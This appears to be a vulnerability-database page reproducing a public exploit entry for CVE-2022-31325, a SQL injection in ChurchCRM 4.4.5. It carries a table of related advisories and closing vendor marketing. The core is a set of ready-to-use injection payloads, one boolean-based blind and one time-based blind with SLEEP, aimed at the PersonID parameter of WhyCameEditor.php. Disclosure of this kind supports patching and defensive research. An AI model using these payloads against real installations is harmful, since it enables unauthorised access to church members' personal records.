| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| ChurchCRM 4.4.5 SQL injection session hijacking Vulnerability | 11 Jun 202200:00 | – | zdt | |
| CVE-2022-31325 | 8 Jun 202216:15 | – | attackerkb | |
| CVE-2022-31325 | 8 Jun 202220:32 | – | circl | |
| ChurchCRM SQL注入漏洞 | 8 Jun 202200:00 | – | cnnvd | |
| ChurchCRM SQL Injection Vulnerability | 9 Jun 202200:00 | – | cnvd | |
| CVE-2022-31325 | 8 Jun 202215:52 | – | cve | |
| CVE-2022-31325 | 8 Jun 202215:52 | – | cvelist | |
| ChurchCRM 4.4.5 - SQLi | 14 Jun 202200:00 | – | exploitdb | |
| EUVD-2022-52867 | 3 Oct 202520:07 | – | euvd | |
| CVE-2022-31325 | 8 Jun 202216:15 | – | nvd |
# Exploit Title: ChurchCRM 4.4.5 - SQLi
# Exploit Author: nu11secur1ty
# Vendor: https://churchcrm.io/
# Software: https://github.com/ChurchCRM/CRM
# Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-31325
## Description:
There is a SQL Injection vulnerability in ChurchCRM 4.4.5 via the 'PersonID' field in /churchcrm/WhyCameEditor.php.
[+] Payloads:
```mysql
---
Parameter: PersonID (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: PersonID=(SELECT (CASE WHEN (6445=6445) THEN 1 ELSE
(SELECT 2844 UNION SELECT 1058) END))&WhyCameID=1&linkBack=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: PersonID=1 AND (SELECT 7116 FROM
(SELECT(SLEEP(5)))xUOx)&WhyCameID=1&linkBack=
---
```
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation